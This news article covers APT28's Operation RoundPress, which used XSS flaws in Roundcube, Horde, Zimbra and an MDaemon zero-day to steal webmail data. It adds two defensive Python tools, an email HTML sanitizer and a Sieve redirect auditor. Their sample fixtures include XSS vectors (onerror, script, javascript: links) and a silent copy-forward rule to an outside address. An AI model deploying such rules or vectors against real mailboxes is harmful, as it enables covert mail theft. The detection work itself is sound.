APT28 Linked to Russia Exploits MDaemon Zero-Day Vulnerability to Compromise Government Webmail Servers
A threat actor linked to Russia has been identified as the driving force behind a sophisticated cyber espionage operation aimed at webmail servers, specifically targeting platforms such as Roundcube, Horde, MDaemon, and Zimbra through cross-site scripting (XSS) vulnerabilities, including a recently discovered zero-day vulnerability in MDaemon. This operation, dubbed Operation RoundPress, has been documented by ESET, a prominent cybersecurity firm, and has been attributed with moderate confidence to the Russian state-sponsored hacking group known as APT28, which is also recognized by other aliases such as BlueDelta, Fancy Bear, and Sofacy.
The primary objective of Operation RoundPress is to exfiltrate confidential data from targeted email accounts. Matthieu Faou, an ESET researcher, reported that most of the victims in this campaign are governmental entities and defense contractors in Eastern Europe, although targets in Africa, Europe, and South America have also been reported.
APT28 has a history of exploiting vulnerabilities in webmail applications. For instance, in June 2023, Recorded Future disclosed that this threat actor had leveraged multiple vulnerabilities within Roundcube to facilitate reconnaissance and data gathering operations.
More recently, other adversarial groups, including Winter Vivern and UNC3707 (commonly referred to as GreenCube), have similarly targeted email solutions, including Roundcube, in various campaigns. The attribution of Operation RoundPress to APT28 is based on email addresses shared with other APT28 spear-phishing activity, together with similarities in server configuration.
In 2024, the campaign has primarily focused on Ukrainian governmental entities and defense companies located in Bulgaria and Romania, some of which are engaged in the production of Soviet-era weapons destined for Ukraine. Furthermore, the campaign has expanded its reach to include governmental, military, and academic institutions in Greece, Cameroon, Ecuador, Serbia, and Cyprus.
The methodology of these attacks involves exploiting XSS vulnerabilities found in Horde, MDaemon, and Zimbra to execute arbitrary JavaScript code within the context of the webmail interface. Notably, one such vulnerability, identified as CVE-2023-43770, was added to the U.S. Cybersecurity and Infrastructure Security Agency (CISA) “Known Exploited Vulnerabilities” catalog in February 2024.
While the targeted vulnerabilities in Horde, Roundcube, and Zimbra were previously recognized and patched, the XSS vulnerability in MDaemon was exploited as a zero-day. It is tracked as CVE-2024-11182 (CVSS score 5.3) and was fixed in MDaemon version 24.5.1, released in November.
The exploitations typically involve sending emails containing malicious code that utilizes XSS flaws to execute JavaScript within the webmail client running in the user’s browser. Successful execution allows the threat actor to read and exfiltrate data from the victim’s account.
For the exploit to succeed, the message must first get past the email service's spam filtering and then be opened by the target in the vulnerable webmail client. The malicious code is embedded within the HTML content of the email body, so nothing is visible to the victim.
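The defensive counterpart to the attack described above is strict server-side sanitization of HTML email bodies before the webmail client renders them. The following Python sanitizer is an added example written for this article; it is not code from ESET, from any of the webmail products named here, or from the campaign. It rebuilds an email body from an allow-list of tags and attributes, drops scripts, event-handler attributes and non-http/mailto/cid URLs, and records everything it removed so a mail administrator can log or alert on messages that needed heavy stripping. The tag and attribute lists, the `cid:`/`https:` scheme policy and the sample message are assumptions chosen for illustration.

```python
import html
import re
from html.parser import HTMLParser

# Assumed allow-list: what a webmail renderer reasonably needs for plain business mail
ALLOWED_TAGS = {"p", "br", "b", "i", "u", "em", "strong", "a", "img", "div", "span",
                "ul", "ol", "li", "table", "tr", "td", "th", "h1", "h2", "h3", "blockquote"}
ALLOWED_ATTRS = {"a": {"href"}, "img": {"src", "alt", "width", "height"},
                 "td": {"colspan", "rowspan"}, "th": {"colspan", "rowspan"}}
# Only these URL schemes are allowed in href/src; everything else (javascript:, data:, ...) is dropped
SAFE_URL = re.compile(r"^(?:https?:|mailto:|cid:)", re.IGNORECASE)
# Elements whose *content* is discarded as well, not just the tag
DROP_WITH_CONTENT = {"script", "style", "iframe", "object", "embed", "svg", "math", "template"}
VOID_TAGS = {"br", "img"}


class EmailHtmlSanitizer(HTMLParser):
    """Rebuilds an HTML email body from the allow-list and keeps an audit trail of what was removed."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0   # > 0 while inside an element whose content is discarded
        self.dropped = []     # audit trail: "tag:script", "attr:img.onerror", "url:a.href", ...

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.skip_depth += 1
            self.dropped.append(f"tag:{tag}")
            return
        if self.skip_depth:
            return
        if tag not in ALLOWED_TAGS:
            self.dropped.append(f"tag:{tag}")   # the tag goes, its text content is kept
            return
        kept = []
        for name, value in attrs:
            name = name.lower()
            value = value or ""
            # Any on* handler, and any attribute not explicitly allowed for this tag, is removed
            if name.startswith("on") or name not in ALLOWED_ATTRS.get(tag, set()):
                self.dropped.append(f"attr:{tag}.{name}")
                continue
            if name in ("href", "src"):
                # Collapse whitespace/control characters so a scheme split across them is still checked
                compact = re.sub(r"[\s\x00-\x1f]+", "", value)
                if not SAFE_URL.match(compact):
                    self.dropped.append(f"url:{tag}.{name}")
                    continue
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if self.skip_depth or tag not in ALLOWED_TAGS or tag in VOID_TAGS:
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        # Text is re-escaped on output, so entities in the input cannot smuggle markup through
        if not self.skip_depth:
            self.out.append(html.escape(data, quote=False))


def sanitize_email_html(raw_html):
    """Return (sanitized_html, list_of_dropped_items) for one email body."""
    parser = EmailHtmlSanitizer()
    parser.feed(raw_html)
    parser.close()
    return "".join(parser.out), parser.dropped


# Constructed sample body mixing legitimate markup with the kinds of elements a sanitizer must strip
SAMPLE_EMAIL_HTML = (
    '<p>Quarterly report attached.</p>'
    '<img src="cid:logo" onerror="x()">'
    '<script>x()</script>'
    '<a href="javascript:x()">open</a>'
    '<a href="https://example.com/report">portal</a>'
)

if __name__ == "__main__":
    clean, dropped = sanitize_email_html(SAMPLE_EMAIL_HTML)
    print(clean)
    print("removed:", dropped)
```

The `dropped` list is the part worth wiring into monitoring: a message that arrives with event handlers or script elements in its body is a candidate for quarantine or review, whether or not the renderer would have executed them.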
Upon successful exploitation, a concealed JavaScript payload, referred to as SpyPress, is executed. This malware is capable of stealing webmail credentials and harvesting email messages and contacts from the victim’s mailbox. Although SpyPress does not establish persistence, it reloads upon each opening of the compromised email message.
ESET further identified variants of SpyPress that can create Sieve rules, a feature of Roundcube that automates email handling. Such rules can redirect copies of incoming emails to an attacker-controlled address, ensuring continuous data exfiltration even if the malicious script is not actively running.
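Because a forwarding rule keeps exfiltrating mail after the script itself is gone, auditing stored Sieve scripts for redirects to external addresses is a useful periodic check. The following Python auditor is an added example written for this article, not a tool from ESET, Roundcube or any Sieve implementation. It strips Sieve comments, finds every `redirect` action (RFC 5228, with the `:copy` tag from RFC 3894 that leaves the original in the mailbox), and flags destinations outside the organization's own domains. The internal-domain list, the mailbox-to-script mapping and the two sample scripts are constructed for the example; a real deployment would read scripts from the server's Sieve storage.

```python
import re
from dataclasses import dataclass

# Constructed: the organisation's own mail domains; any other destination counts as external
INTERNAL_DOMAINS = {"example.gov"}

# Sieve "redirect" action, optionally preceded by tagged arguments such as :copy
REDIRECT_RE = re.compile(r'\bredirect\b(?P<mods>(?:\s+:\w+)*)\s+"(?P<addr>[^"]+)"', re.IGNORECASE)


def strip_sieve_comments(script):
    """Remove # line comments and /* */ block comments while preserving line numbers."""
    script = re.sub(r"/\*.*?\*/", lambda m: "\n" * m.group(0).count("\n"), script, flags=re.DOTALL)
    return re.sub(r"#[^\n]*", "", script)


@dataclass
class Finding:
    mailbox: str
    target: str
    keeps_copy: bool   # :copy leaves the original in place, so the owner sees nothing unusual
    line: int


def audit_sieve_script(mailbox, script, internal_domains=INTERNAL_DOMAINS):
    """Return one Finding per redirect whose destination is outside internal_domains."""
    findings = []
    cleaned = strip_sieve_comments(script)
    for m in REDIRECT_RE.finditer(cleaned):
        addr = m.group("addr").strip()
        domain = addr.rpartition("@")[2].lower()
        if domain in internal_domains:
            continue
        line_no = cleaned.count("\n", 0, m.start()) + 1
        findings.append(Finding(mailbox, addr, ":copy" in m.group("mods").lower(), line_no))
    return findings


def audit_all(scripts, internal_domains=INTERNAL_DOMAINS):
    """Audit a {mailbox: sieve_script} mapping and return every external-redirect finding."""
    return [f for mailbox, script in scripts.items()
            for f in audit_sieve_script(mailbox, script, internal_domains)]


# Constructed sample scripts: one benign filing rule, one silent copy-forward to an outside address
SAMPLE_SCRIPTS = {
    "alice@example.gov": (
        'require ["fileinto"];\n'
        'if header :contains "subject" "newsletter" { fileinto "Lists"; }\n'
    ),
    "bob@example.gov": (
        'require ["copy"];\n'
        '# forward everything\n'
        'if true { redirect :copy "collector@mail-relay.example"; }\n'
        'if header :contains "from" "hr" { redirect "bob.alt@example.gov"; }\n'
    ),
}

if __name__ == "__main__":
    for f in audit_all(SAMPLE_SCRIPTS):
        print(f"{f.mailbox}: line {f.line} redirects to {f.target} (copy={f.keeps_copy})")
```

The regex handles the common quoted-string form of the address; multi-line `text:` strings and more exotic Sieve syntax would need a real parser. Comparing each run's findings against the previous one turns this into a change alert: a redirect that appears between audits, with `:copy` set and an unfamiliar domain, is exactly the pattern the article describes.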
Exfiltrated data is typically transmitted to a designated command-and-control (C2) server via HTTP POST requests. Certain SpyPress variants are also capable of capturing login history, two-factor authentication codes, and generating application passwords for MDaemon, thereby enabling sustained access to the mailbox even if the primary password is changed.
Over the past two years, webmail servers like Roundcube and Zimbra have become prime targets for various espionage groups due to their susceptibility to exploitation and the fact that many organizations fail to maintain their webmail infrastructure. Given that vulnerabilities can be triggered remotely through email, attacking these servers for data acquisition presents an appealing opportunity for adversaries.